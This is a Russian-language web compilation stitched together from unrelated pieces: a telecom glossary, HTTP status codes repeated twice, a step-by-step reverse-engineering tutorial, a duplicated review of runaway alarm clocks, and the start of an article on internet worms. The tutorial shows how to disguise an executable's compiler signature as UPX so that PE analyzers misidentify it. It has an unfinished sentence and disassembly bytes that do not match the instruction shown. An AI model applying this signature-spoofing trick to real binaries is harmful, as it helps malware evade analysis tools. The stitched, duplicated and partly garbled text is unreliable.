- DSLAM (Digital Subscriber Line Access Multiplexer) – устройство оператора, которое обеспечивает подключение множества абонентских ADSL-линий к сети провайдера.
- DNS (Domain Name System) - система доменных имен, способная по запросу, содержащему доменное имя хоста (компьютера или другого сетевого устройства), сообщить IP-адрес или (в зависимости от запроса) другую информацию.
- Ethernet-порт - это порт, с помощью которого компьютер подключается к сети.
- FTP (File Transfer Protocol) – это протокол, который используется для передачи информации (файлов) в сети. Требует наличия идентификатора (имени и пароля) для получения доступа к компьютеру, на который или с которого передаются файлы.
- FTP-сервер - сервер, обеспечивающий обмен файлами по протоколу FTP.
- FTTB (Fiber to the Building) – технология доступа при помощи оптики, подведенной к зданию. Под такой технологией понимают работу оптического узла (ОУ) в среднем на 100-250 абонентов (например, 9…12-ти этажный дом на 4…6 подъездов). Это прогрессивная технология, позволяющая подавать клиенту широкополосный доступ в Интернет на скорости до 10 Гбит/c, услуги IP- телефонии и телевидения по одному кабелю.
- HTTP (Hyper Text Transfer Protocol) – протокол передачи гипертекстовой информации, отформатированной при помощи специализированного языка описания страниц HTML.
- International deny – блокировка международной связи.
- IP-адрес – уникальный идентификатор (адрес) компьютера, подключенного к локальной сети или Интернету.
- IP-телефония (VOIP – Voice over Internet protocol) – технология, позволяющая использовать IP-сеть в качестве средства организации и ведения телефонных переговоров и передачи факсов в режиме реального времени.
- ISDN (Integrated Services Digital Network) – интеграция телекоммуникационных услуг на базе цифровых сетей, которая обеспечивает подключение по цифровому интерфейсу различного абонентского оборудования и поддерживает широкий спектр телекоммуникационных услуг: телефонию, передачу данных и Интернет.
- ISDN PRI – подключение по интерфейсу первичного доступа и витой медной пары тридцати В-каналов с суммарной пропускной способностью 1920 Кбит/с. Первичный доступ дает возможность одновременно проводить до 30 телефонных разговоров или сеансов передачи данных со скоростью каждого сеанса 64 Кbps.
- IP/MPLS – многопротокольная междугородная сеть передачи данных.
- MAC-адрес (Media Access Control) – уникальный идентификатор, сопоставляемый с различными типами оборудования для компьютерных сетей. MAC-адреса формируют основу сетей, которую используют протоколы более высокого (сетевого) уровня. Именно он является ограниченным, конечным ресурсом сети Интернет.
- MAN (Metro Area Network) – сеть передачи данных, охватывающая городской район, город, объединяющая в единую сеть подключенные к ней локальные компьютерные сети (LAN – Local Аrea Network).
- Media Access Control (MAC) - уникальный идентификатор, сопоставляемый с различными типами оборудования для компьютерных сетей. MAC-адреса формируют основу сетей на канальном уровне, которую используют протоколы более высокого (сетевого) уровня. Именно он является ограниченным, конечным ресурсом сети Интернет.
- Metro Area Network (MAN) – технология, с помощью которой здания объединяются волоконно-оптическими магистралями. Внутри зданий применяются соединения по медным кабелям, на расстояния не более 100 м. Это позволяет при необходимости достигать скоростей до 10 Gbps.
- MPLS (Multiprotocol Label Switching) – технология быстрой коммутации пакетов в многопротокольных сетях передачи данных.
- National deny – блокировка междугородной связи.
- РРР-логин (Point-to-Point Protocol) – имя для авторизации пользователя для входа в Интернет.
- PWD Call (Рassword Сall) – предоставление связи по паролю.
- Quality of Service (QoS) - обозначает уровень обслуживания, который определяет набор параметров и соответствующих им граничных значений, характеризующих качество услуги с точки зрения работоспособности приложений, которые могут использоваться клиентом и для которых данные параметры являются критичными.
- SPLITTER – устройство, которое разделяет ADSL-сигнал на компоненты «голос» и «передача данных». Оно позволяет одновременно по одной линии получать доступ в Интернет и вести телефонный разговор.
- VPN (Virtual Private Network) - способ передачи данных, в том числе организация и обслуживание каналов передачи, между точками (офисами) клиента. Способ предполагает объединение двух и более территориально удаленных офисов в единую защищенную полносвязную сеть для обмена данными с использованием ресурсов транспортной сети оператора. Обязательным условием является соблюдение параметров и правил передачи разнородного трафика – классов обслуживания.
- WWW - сайт (World Wide Web) – совокупность файлов, позволяющих пользователям Интернета интерактивно взаимодействовать с ними при помощи протокола HTTP. Он построен при использовании языка описания страниц HTML, позволяющем создавать гипертекстовые документы, т.е. документы, взаимосвязанные посредством перекрестных ссылок из одного документа в другой. Технология построения web-сайта позволяет кроме текстовой информации размещать графическую, аудио- и видеоинформацию, а также использовать другие языки программирования для создания специализированных сервисов и эффектов.
Ошибки веб серверов
Что означают ошибки web-серверов? Например, что значит 404 или 403? Что встречали? Что-то знакомое? Поскольку эта справка по кодам ошибок http-сервера создавалась как дополнение к настройке файла .htaccess и должна была показать какие ошибки можно в нем переопределить, в целях экономии времени, я не утруждался полным разьяснением ошибок, а дал лишь краткое описение. Возможно со временем, я растолкую все ошибки http-сервера подробней.
Коды ошибок посылаются WEB-сервером агенту пользователя для определения его дальнейшего поведения. Этот код можно перехватить и, изменив, заставить браузер посетителя творить черт знает что (если, конечно, нам этого захочется).
Ошибки ВЕБ-сервера делятся на диапазоны:
100-199 Информационный. Сообщает агенту что, запрос агента принят и обрабатывается 200-299 Запрос агента обработан успешно, сервер отправил клиенту запрашиваемый документ 300-399 Запрос агента изменен и агенту нужно предпринять некоторые действия для удовлетворения измененного запроса. 400-499 Проблемы при попытке выполнить запрос. 500-599 Ошибки сервера
В диапазоне определены лишь несколько кодов, хотя для сервера при необходимости могут определяться собственные коды. При получении кода, который не может распознать, агент интерпретирует его в соответствии с диапазоном, к которому этот код принадлежит. Коды в диапазонах 100-199, 200-299 и 300-399 большинство Web-броузеров обрабатывают без извещения пользователя, а некоторые коды ошибок из диапазонов 400-499, 500-599 отображаются для пользователя.
Код ошибки http сервера - ошибка 100 Continue
Начальная часть запроса принята, и клиент может продолжать передачу запроса.
Код ошибки http сервера - ошибка 101 Switching Protocols
Сервер выполняет требование клиента и переключает протоколы в соответствии с указанием, данным в поле заголовка Upgrade.
Код ошибки http сервера - ошибка 200 OK
Запрос клиента обработан успешно и ответ сервера содержит затребованные данные.
Код ошибки http сервера - ошибка 201 Created
Этот код состояния используется в случае создания нового URI. Вместе с этим кодом результата сервер выдает заголовок Location, который содержит информацию о том, куда были помещены новые данные.
Код ошибки http сервера - ошибка 202 Accepted
Запрос принят, но обрабатывается не сразу. В теле содержимого ответа сервера может быть дана дополнительная информация о данной транзакции. Гарантии того, что сервер в конечном итоге удовлетворит запрос, нет, даже несмотря на то, что на момент приема запрос выглядел допустимым.
Код ошибки http сервера - ошибка 203 Non-Authoritative Information
Информация в заголовке содержимого взята из локальной копии или у третьей стороны, а не с исходного сервера.
Код ошибки http сервера - ошибка 204 No Content
Ответ содержит код состояния и заголовок, но тело содержимого отсутствует. При получении этого ответа броузер не должен обновлять свой документ. Обработчик чувствительных областей изображений может возвращать этот код, когда пользователь щелкает на бесполезных или пустых участках изображения.
Код ошибки http сервера - ошибка 205 Reset Content
Броузер должен очистить форму, используемую в данной транзакции, для дополнительных входных данных. Полезен для CGI-приложений, требующих ввода данных.
Код ошибки http сервера - ошибка 206 Partial Content
Сервер возвращает лишь часть данных затребованного объема. Используется в ответе на запрос с указанием заголовка Range. Сервер должен указать диапазон, включенный в ответ, в заголовке Content-Range.
Код ошибки http сервера - ошибка 300 Multiple Choices
Затребованный URI обозначает более одного ресурса. Например, URI может обозначать документ, переведенный на несколько языков. В теле содержимого, возвращенном сервером, может находиться перечень более конкретных данных о том, как выбрать ресурс правильно.
Код ошибки http сервера - ошибка 301 Moved Permanently
Затребованный URI уже не используется сервером, и указанная в запросе операция не выполнена. Новое местонахождение затребованного документа указывается в заголовке Location (см. настройки файла .htaccess). Во всех последующих запросах данного документа следует указывать новый URI.
Код ошибки http сервера - ошибка 302 Moved Temporarily
Затребованный URI перемешен, но лишь временно. Заголовок Location указывает на новое местонахождение. Сразу же после получения этого кода состояния клиент должен разрешить запрос при помощи нового URI (см. настройки файла .htaccess), но во всех последующих запросах необходимо пользоваться старым URI.
Код ошибки http сервера - ошибка 303 See Other
Затребованный URI можно найти по другому URI, указанному в заголовке Location (см. настройки файла .htaccess). Его следует выбрать методом GET по данному ресурсу.
Код ошибки http сервера - ошибка 304 Not Modified
Это код ответа на заголовок lf-Modified-Since, если URI не изменялся с указанной даты. Тело содержимого не посылается, и клиент должен использовать свою локальную копию.
Код ошибки http сервера - ошибка 305 Use Proxy
Доступ к затребованному URI должен осуществляться через proxy-сервер, указанный в заголовке Location.
Код ошибки http сервера - ошибка 400 Bad Request
Означает, что сервер обнаружил в запросе клиента синтаксическую ошибку.
Код ошибки http сервера - ошибка 401 Unauthorized
Этот код результата, передаваемый с заголовком WWW-Authenticate, показывает, что пославший запрос пользователь не имеет необходимых полномочий и что при повторении запроса с указанием данного URI пользователь должен такие полномочия предоставить.
Код ошибки http сервера - ошибка 402 Payment Required
Этот код в HTTP еще не реализован.
Код ошибки http сервера - ошибка 403 Forbidden
Запрос отклонен по той причине, что сервер не хочет (или не имеет возможности) ответить клиенту.
Возможные причины ошибки:
Вы пытаетесь запустить CGI-скрипт, расположенный вне CGI-директории (например, в директории документов сервера www).
Можно запускать скрипты из www-директории только если в ней есть файл .htaccess (с точкой в начале) следующего содержания: Options +ExecCGI
Возможно, вы пытаетесь открыть картинку или статический HTML-файл, расположенный в CGI-директории. Этого делать нельзя. Все рисунки (а также другие файлы, за исключениям скриптов) должны находиться в www-директории.
Если вы ожидаете получить листинг каталога, но выводится эта ошибка, вероятно, для данной директории выдача листинга запрещена (например, это CGI-папка). Для разрешения листинга в нужной директории должен находиться файл .htaccess следующего содержания: Options +Indexes
Код ошибки http сервера - ошибка 404 Not Found
Документ по указанному URL не существует. Возможно, такой файл удален, а возможно, вы ошиблись при наборе URL в браузере или пошли по неверной ссылке.
Код ошибки http сервера - ошибка 405 Method Not Allowed
Этот код выдается с заголовком Allow и показывает, что метод, используемый клиентом, для данного URL не поддерживается.
Возможно, вы пытаетесь отправить данные POST-форму на страницу, которая не является скриптом (например, на SHTML-страницу). Проверьте путь в атрибуте action тэга , инициировавшего данный запрос. Проверьте также, не пуст ли этот атрибут (и задан ли).
Код ошибки http сервера - ошибка 406 Not Acceptable
Ресурс, указанный клиентом по данному URL, существует, но не в том формате, который нужен клиенту. Вместе с этим кодом сервер выдает заголовки Content-Language, Content-Encoding и Content-Type.
Код ошибки http сервера - ошибка 407 Proxy Authentication Required
Proxy-сервер должен санкционировать запрос перед тем, как пересылать его. Используется с заголовком Proxy-Authenticate.
Код ошибки http сервера - ошибка 408 Request Time-out
Этот код ответа означает, что клиент не передал полный запрос в течение некоторого установленного промежутка времени (который обычно задается в конфигурации сервера) и сервер разрывает сетевое соединение.
Код ошибки http сервера - ошибка 409 Conflict
Данный запрос конфликтует с другим запросом или с конфигурацией сервера. Информацию о конфликте следует возвратить в информационной части ответа.
Код ошибки http сервера - ошибка 410 Gone
Данный код показывает, что затребованный URL больше не существует и навсегда удален с сервера.
Код ошибки http сервера - ошибка 411 Length Required
Сервер отказывается принимать запрос без определенного Content-Length.
Код ошибки http сервера - ошибка 412 Precondition Failed
Результат вычисления условия, заданного в запросе одним или несколькими заголовками if... , представляет собой "ложь".
Код ошибки http сервера - ошибка 413 Request Entity Too Large
Сервер не будет обрабатывать запрос, потому что его содержание слишком велико.
Код ошибки http сервера - ошибка 414 Request URL Too Long
Сервер не будет обрабатывать запрос, потому что его URL слишком длинный.
Код ошибки http сервера - ошибка 415 Unsupported Media Type
Сервер не будет обрабатывать запрос, потому что его тело имеет неподдерживаемый формат.
Код ошибки http сервера - ошибка 416 Requested Range Not Satisfiable
Сервер сообщает - форма запроса (требуемый диапазон) не выполнима.
Код ошибки http сервера - ошибка 417 Expectation Failed
Сервер сообщает - время ожидания истекло.
Код ошибки http сервера - ошибка 500 Internal Server Error
При обработке запроса на сервере один из его компонентов (например, CGI-программа) выдал аварийный отказ или столкнулся с ошибкой конфигурации. Причиной этого могут быть неправильные инструкции в файле .htaccess, неправильные атрибуты на CGI-скрипте (должны быть 755). Так же, это может быть ошибка в скрипте. Точную причину можно установить, просматривая error.log.
Код ошибки http сервера - ошибка 501 Not Implemented
Клиент запросил выполнение действия, которое сервер выполнить не может.
Код ошибки http сервера - ошибка 502 Bad Gateway
Сервер (или proxy-сервер) получил недопустимые ответы другого сервера (или proxy-сервера)
Код ошибки http сервера - ошибка 503 Service Unavailable
Данный код означает, что данная служба временно недоступна, но в будущем доступ к ней будет восстановлен. Если сервер знает, когда это произойдет, может быть также выдан заголовок Retry-After.
Код ошибки http сервера - ошибка 504 Gateway Time-out
Этот ответ похож на 408 (Request Time-out), за исключением того, что шлюз или уполномоченный сервер превысил лимит времени.
Код ошибки http сервера - ошибка 505 HTTP Version not supported
Версия HTTP не поддерживается данным сервером.
Напоминаю, что ответы об ошибках генерируемые сервером могут быть подделаны, а то и вовсе при ошибке может отображаться произвольная страница например html с надписью "Ошипко"
Коды ошибок посылаются WEB-сервером агенту пользователя для определения его дальнейшего поведения. Этот код можно перехватить и, изменив, заставить браузер посетителя творить черт знает что (если, конечно, нам этого захочется).
Ошибки ВЕБ-сервера делятся на диапазоны:
100-199 Информационный. Сообщает агенту что, запрос агента принят и обрабатывается 200-299 Запрос агента обработан успешно, сервер отправил клиенту запрашиваемый документ 300-399 Запрос агента изменен и агенту нужно предпринять некоторые действия для удовлетворения измененного запроса. 400-499 Проблемы при попытке выполнить запрос. 500-599 Ошибки сервера
В диапазоне определены лишь несколько кодов, хотя для сервера при необходимости могут определяться собственные коды. При получении кода, который не может распознать, агент интерпретирует его в соответствии с диапазоном, к которому этот код принадлежит. Коды в диапазонах 100-199, 200-299 и 300-399 большинство Web-броузеров обрабатывают без извещения пользователя, а некоторые коды ошибок из диапазонов 400-499, 500-599 отображаются для пользователя.
Код ошибки http сервера - ошибка 100 Continue
Начальная часть запроса принята, и клиент может продолжать передачу запроса.
Код ошибки http сервера - ошибка 101 Switching Protocols
Сервер выполняет требование клиента и переключает протоколы в соответствии с указанием, данным в поле заголовка Upgrade.
Код ошибки http сервера - ошибка 200 OK
Запрос клиента обработан успешно и ответ сервера содержит затребованные данные.
Код ошибки http сервера - ошибка 201 Created
Этот код состояния используется в случае создания нового URI. Вместе с этим кодом результата сервер выдает заголовок Location, который содержит информацию о том, куда были помещены новые данные.
Код ошибки http сервера - ошибка 202 Accepted
Запрос принят, но обрабатывается не сразу. В теле содержимого ответа сервера может быть дана дополнительная информация о данной транзакции. Гарантии того, что сервер в конечном итоге удовлетворит запрос, нет, даже несмотря на то, что на момент приема запрос выглядел допустимым.
Код ошибки http сервера - ошибка 203 Non-Authoritative Information
Информация в заголовке содержимого взята из локальной копии или у третьей стороны, а не с исходного сервера.
Код ошибки http сервера - ошибка 204 No Content
Ответ содержит код состояния и заголовок, но тело содержимого отсутствует. При получении этого ответа броузер не должен обновлять свой документ. Обработчик чувствительных областей изображений может возвращать этот код, когда пользователь щелкает на бесполезных или пустых участках изображения.
Код ошибки http сервера - ошибка 205 Reset Content
Броузер должен очистить форму, используемую в данной транзакции, для дополнительных входных данных. Полезен для CGI-приложений, требующих ввода данных.
Код ошибки http сервера - ошибка 206 Partial Content
Сервер возвращает лишь часть данных затребованного объема. Используется в ответе на запрос с указанием заголовка Range. Сервер должен указать диапазон, включенный в ответ, в заголовке Content-Range.
Код ошибки http сервера - ошибка 300 Multiple Choices
Затребованный URI обозначает более одного ресурса. Например, URI может обозначать документ, переведенный на несколько языков. В теле содержимого, возвращенном сервером, может находиться перечень более конкретных данных о том, как выбрать ресурс правильно.
Код ошибки http сервера - ошибка 301 Moved Permanently
Затребованный URI уже не используется сервером, и указанная в запросе операция не выполнена. Новое местонахождение затребованного документа указывается в заголовке Location (см. настройки файла .htaccess). Во всех последующих запросах данного документа следует указывать новый URI.
Код ошибки http сервера - ошибка 302 Moved Temporarily
Затребованный URI перемешен, но лишь временно. Заголовок Location указывает на новое местонахождение. Сразу же после получения этого кода состояния клиент должен разрешить запрос при помощи нового URI (см. настройки файла .htaccess), но во всех последующих запросах необходимо пользоваться старым URI.
Код ошибки http сервера - ошибка 303 See Other
Затребованный URI можно найти по другому URI, указанному в заголовке Location (см. настройки файла .htaccess). Его следует выбрать методом GET по данному ресурсу.
Код ошибки http сервера - ошибка 304 Not Modified
Это код ответа на заголовок lf-Modified-Since, если URI не изменялся с указанной даты. Тело содержимого не посылается, и клиент должен использовать свою локальную копию.
Код ошибки http сервера - ошибка 305 Use Proxy
Доступ к затребованному URI должен осуществляться через proxy-сервер, указанный в заголовке Location.
Код ошибки http сервера - ошибка 400 Bad Request
Означает, что сервер обнаружил в запросе клиента синтаксическую ошибку.
Код ошибки http сервера - ошибка 401 Unauthorized
Этот код результата, передаваемый с заголовком WWW-Authenticate, показывает, что пославший запрос пользователь не имеет необходимых полномочий и что при повторении запроса с указанием данного URI пользователь должен такие полномочия предоставить.
Код ошибки http сервера - ошибка 402 Payment Required
Этот код в HTTP еще не реализован.
Код ошибки http сервера - ошибка 403 Forbidden
Запрос отклонен по той причине, что сервер не хочет (или не имеет возможности) ответить клиенту.
Возможные причины ошибки:
Вы пытаетесь запустить CGI-скрипт, расположенный вне CGI-директории (например, в директории документов сервера www).
Можно запускать скрипты из www-директории только если в ней есть файл .htaccess (с точкой в начале) следующего содержания: Options +ExecCGI
Возможно, вы пытаетесь открыть картинку или статический HTML-файл, расположенный в CGI-директории. Этого делать нельзя. Все рисунки (а также другие файлы, за исключениям скриптов) должны находиться в www-директории.
Если вы ожидаете получить листинг каталога, но выводится эта ошибка, вероятно, для данной директории выдача листинга запрещена (например, это CGI-папка). Для разрешения листинга в нужной директории должен находиться файл .htaccess следующего содержания: Options +Indexes
Код ошибки http сервера - ошибка 404 Not Found
Документ по указанному URL не существует. Возможно, такой файл удален, а возможно, вы ошиблись при наборе URL в браузере или пошли по неверной ссылке.
Код ошибки http сервера - ошибка 405 Method Not Allowed
Этот код выдается с заголовком Allow и показывает, что метод, используемый клиентом, для данного URL не поддерживается.
Возможно, вы пытаетесь отправить данные POST-форму на страницу, которая не является скриптом (например, на SHTML-страницу). Проверьте путь в атрибуте action тэга , инициировавшего данный запрос. Проверьте также, не пуст ли этот атрибут (и задан ли).
Код ошибки http сервера - ошибка 406 Not Acceptable
Ресурс, указанный клиентом по данному URL, существует, но не в том формате, который нужен клиенту. Вместе с этим кодом сервер выдает заголовки Content-Language, Content-Encoding и Content-Type.
Код ошибки http сервера - ошибка 407 Proxy Authentication Required
Proxy-сервер должен санкционировать запрос перед тем, как пересылать его. Используется с заголовком Proxy-Authenticate.
Код ошибки http сервера - ошибка 408 Request Time-out
Этот код ответа означает, что клиент не передал полный запрос в течение некоторого установленного промежутка времени (который обычно задается в конфигурации сервера) и сервер разрывает сетевое соединение.
Код ошибки http сервера - ошибка 409 Conflict
Данный запрос конфликтует с другим запросом или с конфигурацией сервера. Информацию о конфликте следует возвратить в информационной части ответа.
Код ошибки http сервера - ошибка 410 Gone
Данный код показывает, что затребованный URL больше не существует и навсегда удален с сервера.
Код ошибки http сервера - ошибка 411 Length Required
Сервер отказывается принимать запрос без определенного Content-Length.
Код ошибки http сервера - ошибка 412 Precondition Failed
Результат вычисления условия, заданного в запросе одним или несколькими заголовками if... , представляет собой "ложь".
Код ошибки http сервера - ошибка 413 Request Entity Too Large
Сервер не будет обрабатывать запрос, потому что его содержание слишком велико.
Код ошибки http сервера - ошибка 414 Request URL Too Long
Сервер не будет обрабатывать запрос, потому что его URL слишком длинный.
Код ошибки http сервера - ошибка 415 Unsupported Media Type
Сервер не будет обрабатывать запрос, потому что его тело имеет неподдерживаемый формат.
Код ошибки http сервера - ошибка 416 Requested Range Not Satisfiable
Сервер сообщает - форма запроса (требуемый диапазон) не выполнима.
Код ошибки http сервера - ошибка 417 Expectation Failed
Сервер сообщает - время ожидания истекло.
Код ошибки http сервера - ошибка 500 Internal Server Error
При обработке запроса на сервере один из его компонентов (например, CGI-программа) выдал аварийный отказ или столкнулся с ошибкой конфигурации. Причиной этого могут быть неправильные инструкции в файле .htaccess, неправильные атрибуты на CGI-скрипте (должны быть 755). Так же, это может быть ошибка в скрипте. Точную причину можно установить, просматривая error.log.
Код ошибки http сервера - ошибка 501 Not Implemented
Клиент запросил выполнение действия, которое сервер выполнить не может.
Код ошибки http сервера - ошибка 502 Bad Gateway
Сервер (или proxy-сервер) получил недопустимые ответы другого сервера (или proxy-сервера)
Код ошибки http сервера - ошибка 503 Service Unavailable
Данный код означает, что данная служба временно недоступна, но в будущем доступ к ней будет восстановлен. Если сервер знает, когда это произойдет, может быть также выдан заголовок Retry-After.
Код ошибки http сервера - ошибка 504 Gateway Time-out
Этот ответ похож на 408 (Request Time-out), за исключением того, что шлюз или уполномоченный сервер превысил лимит времени.
Код ошибки http сервера - ошибка 505 HTTP Version not supported
Версия HTTP не поддерживается данным сервером.
Напоминаю, что ответы об ошибках генерируемые сервером могут быть подделаны, а то и вовсе при ошибке может отображаться произвольная страница например html с надписью "Ошипко"
Обман анализатора
Цель: Подменить одну сигнатуру на другую сигнатуру
Сложность: 2/10(легко)
Инструменты: FBA(www.team-x.ru/Flashback) для анализа, CFF Explorer, OllyDBG
Подопытная прога: FaNt0m's CrackMe #1
Предисловие:
Я не видел статей про ручную подмену сигнатур по этому написал, и подменивать мы будем сигнатуру FASM на UPX 0.50 - 0.70 в FaNt0m's CrackMe #1
Менять одну сигнатуру на другую мы будем в несколко шагов:
1) Добавление секции и изменение EP(EntryPoint)
2) Вставка нужной нам сигнатуры при помощи OllyDBG
3) Rebuild Pe
Добавление секции и изменение EP(EntryPoint):
Если мы посмотрим в FBA CRACKME1.EXE, то он определит что откомпелировано FASM, EP section = .text, и скажет, что EP = 1000. Щас мы добавим новую секцию и поменяем EP на ее начало.
Откроем CRACKME1.EXE в CFF Explorer. Зайдем в Section Headers, нажмем правой кнопкой мыши по по правой части окна -> Add section(Empty spice), введем нужный нам размер секции(я ввел 100). Теперь появилась 5-ая секция, но она без имени (я назвал ее UPX1). Все, секция добавлена. Ее Virtual Adress = 5000. Щас мы будем менять EP на ее начало.
Зайдем в Optional Header. AdressOfEntryPoint=1000, поменяем его на 5000. Все, мы сменили EP.
File -> Save, чтобы сохранить изменения.
Вставка нужной нам сигнатуры при помощи OllyDBG:
Если мы сейчас запустим CRACKME1.EXE, но щас мы все поправим.
Откроем CRACKME1.EXE в OllyDBG. Вот такую картину мы видим:
00405000 0000 ADD [BYTE DS:EAX],AL
00405002 0000 ADD [BYTE DS:EAX],AL
00405004 0000 ADD [BYTE DS:EAX],AL
00405006 0000 ADD [BYTE DS:EAX],AL
00405008 0000 ADD [BYTE DS:EAX],AL
0040500A 0000 ADD [BYTE DS:EAX],AL
0040500C 0000 ADD [BYTE DS:EAX],AL
0040500E 0000 ADD [BYTE DS:EAX],AL
00405010 0000 ADD [BYTE DS:EAX],AL
00405012 0000 ADD [BYTE DS:EAX],AL ; и так до конца
Щас нам нужно засунуть сигнатуру UPX 0.50 - 0.70 = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 (скопируйте это в буфер). Для этого выберем n-ое число строк в нашем случае хватет до 00405012 (но можно больше, роли не играет) и нажмем Ctrl+E.
Вставьте скопированную нами в буфер сигнатуру, нажав правую кнопку мыши -> Paste или shift+insert. Нажмите ОК.
Вот что мы получили:
00405000 60 PUSHAD
00405001 E8 00000000 CALL CRACKME1.00405006
00405006 58 POP EAX
00405007 83E8 3D SUB EAX,3D
0040500A 50 PUSH EAX
0040500B 8DB8 000000FF LEA EDI,[DWORD DS:EAX+FF000000]
00405011 57 PUSH EDI
00405012 8DB0 00000000 LEA ESI,[DWORD DS:EAX]
Сигнатура вставлена, осталось добавить прыжок на старый EP=1000 (точнее, Virtual EP=1000(EP)+400000(ImageBase)), а то прога работать не будет.
Выберем строку ниже, т.е. 00405018, нажмем пробел, вводим JMP 401000 нажимаем enter (хотя, на старый ep можно прыгнуть более изощреными способами, например:
00405018 B8 00052000 MOV EAX,00401000
00405022 50 PUSH EAX
00405023 C3 RETN
Нажимаем правую кнопку мыши (F10) -> Copy to executable -> All modification -> Copy All -> Save file, вводим новое имя (например, CRACKME1_FakeSign) и сохраняем.
Мы добавили сигнатуру, но некоторые скажут, что когда мы добавляли новую секцию то выбрали более большой размер, щас мы исправим это.
Rebuild Pe:
Ща размер CRACKME1_FakeSign.EXE равен 8192 байт.
Откроем прогу в FBA. Plugins -> PEiD plugins user -> RebuildPe, жмем Rebuild.
Теперь размер равен 7714 байта. Мы уменьшили размер на 478 байта, мелочь, а приятно.
Заключение:
Ну, вот и все. Мы смогли обмануть гадкие анализаторы, хотя, если бы мы упаковали прогу UPX, а затем сменили бы сигну на Delphi, то не все бы анализторы нам поверили на 100%.
Убегающий будильник
Печальный опыт говорит о том, что действительно эффективный будильник – тот, который сложно отключить. Лучше всего – такой, для отключения которого придется проснуться. Например, вскочить с постели и носиться, пытаясь поймать эту тварь, которая ловко ездит по комнате, испуская отчаянный «би-ип!»

Размеры: 19,5х9х9 см

Clocky предлагается хромированном (60 долларов) или пластиковом (50 долларов) корпусе четырех расцветок

Mr. Clock Radio обойдется почти в целых 80 долларов и будет изводить вас каждое утро - не смотрите, что глаза у него такие добрые...

Будильник-сирена стоит всего-то около 10 долларов
Счастливые обладатели Clocky Runaway Alarm Clock могут быть уверены в том, что не проспят ни одной важной встречи и не опоздают на работу. Несчастные, они вынуждены будут всякий раз, когда этот подлец зазвонит, догонять его: будильник устроен так, что, как раз начав испускать противное «би-ип!», он начинает ехать прочь – а уж затем все решает скорость и проворство.
Включенный режим Snooze делает этот процесс еще и забавным (по крайней мере, со стороны): Clocky издает сигнал и, замолчав, отбегает. Ошарашенный хозяин пытается обнаружить его и выключить, но тот, снова просигналив какое-то время, опять укатывается прочь… интересно, как долго такое может продолжаться?..
Clocky выдерживает падение с примерно метровой высоты, зато вот чересчур ворсистые ковер может стать для него непреодолимой ловушкой. Питается он от 4-х батарей ААА.
Будильники – первое, с чем мы сталкиваемся поутру, и немудрено, что эта тема живо волнует всю редакцию ПМ. Напомним, что мы уже рассказывали о необычных вариантах, которые привлекли наше внимание. А именно – о будильнике, для отключения которого потребуется здравый ум и твердая память («Будильник для умных»), и о другом, который сам выбирает подходящий момент, чтобы поднять вас в наилучшем настроении («Ловцы сновидений»).
Кстати, готовя заметку об этом «убегающем» будильнике, мы наткнулись еще на парочку крайне интересных его собратьев, мимо которых пройти – совершенно выше всяческих сил! Первый – Mr. Clock Radio – настоящий зануда. Он не принимает ответа «нет» и будет уговаривать вас, кричать, то и дело включать радио, мигать кучей лампочек и вообще всеми способами изводить вас, покуда вы не проснетесь. Ну и, наконец, самый изуверский вариант – полицейская сирена Police Siren Alarm Clock. Этот поднимет даже мертвого, а живым его пользователям понадобятся очень и очень крепкие нервы и безупречно чистая совесть.

Размеры: 19,5х9х9 см

Clocky предлагается хромированном (60 долларов) или пластиковом (50 долларов) корпусе четырех расцветок

Mr. Clock Radio обойдется почти в целых 80 долларов и будет изводить вас каждое утро - не смотрите, что глаза у него такие добрые...

Будильник-сирена стоит всего-то около 10 долларов

Включенный режим Snooze делает этот процесс еще и забавным (по крайней мере, со стороны): Clocky издает сигнал и, замолчав, отбегает. Ошарашенный хозяин пытается обнаружить его и выключить, но тот, снова просигналив какое-то время, опять укатывается прочь… интересно, как долго такое может продолжаться?..
Clocky выдерживает падение с примерно метровой высоты, зато вот чересчур ворсистые ковер может стать для него непреодолимой ловушкой. Питается он от 4-х батарей ААА.
Будильники – первое, с чем мы сталкиваемся поутру, и немудрено, что эта тема живо волнует всю редакцию ПМ. Напомним, что мы уже рассказывали о необычных вариантах, которые привлекли наше внимание. А именно – о будильнике, для отключения которого потребуется здравый ум и твердая память («Будильник для умных»), и о другом, который сам выбирает подходящий момент, чтобы поднять вас в наилучшем настроении («Ловцы сновидений»).
Кстати, готовя заметку об этом «убегающем» будильнике, мы наткнулись еще на парочку крайне интересных его собратьев, мимо которых пройти – совершенно выше всяческих сил! Первый – Mr. Clock Radio – настоящий зануда. Он не принимает ответа «нет» и будет уговаривать вас, кричать, то и дело включать радио, мигать кучей лампочек и вообще всеми способами изводить вас, покуда вы не проснетесь. Ну и, наконец, самый изуверский вариант – полицейская сирена Police Siren Alarm Clock. Этот поднимет даже мертвого, а живым его пользователям понадобятся очень и очень крепкие нервы и безупречно чистая совесть.
Секреты интернет-червей
Ни для кого не секрет, что сегодня вирусы представляют собой самую серьезную опасность практически для любого компьютера. Эти зловредные программы чаще всего атакуют ПК домашних пользователей, они нередко оказываются повинны во временном выходе из строя корпоративных локальных сетей, и они же помогают злоумышленникам блокировать удаленные серверы, делая недоступными те или иные сервисы. История вирусов уходит своими корнями в далекий 1949 год, когда один из ученых разработал теорию самовоспроизводящихся алгоритмов. Но только с повсеместным распространением Интернета зловредные программы стали самым настоящим бедствием. И, естественно, самую серьезную опасность представляют сетевые вирусы, или, как их чаще всего называют, черви.
Главным признаком интернет-червей является среда их распространения. В принципе она ясна прямо из названия: эти зловредные программы размножаются с помощью Глобальной сети. Впрочем, делают это они по-разному. Некоторые используют для распространения электронную почту, другие - средства сетевого общения, третьи просто "пролазят в дырки" системы защиты. Помимо этого сетевым червям присущи некоторые другие особенности: полиморфизм, невидимость, разные способы внедрения в систему жертвы и т. д. Однако определяющей особенностью, на которой построена система классификации интернет-червей, остается все-таки способ распространения. И сейчас мы с вами, уважаемые читатели, рассмотрим наиболее распространенные типы этих зловредных программ.
Черви, распространяющиеся с помощью электронной почты
Современный Интернет просто-напросто невозможно представить себе без электронной почты. Более того, именно этот сервис, который позволяет людям, живущим на разных концах земного шара, общаться друг с другом, дал изначальный толчок развития Глобальной сети. И сегодня у каждого интернетчика есть ящик электронной почты, причем чаще всего не один. А поэтому нет ничего удивительного в том, что создатели вирусов обратили свое внимание на данный сервис.
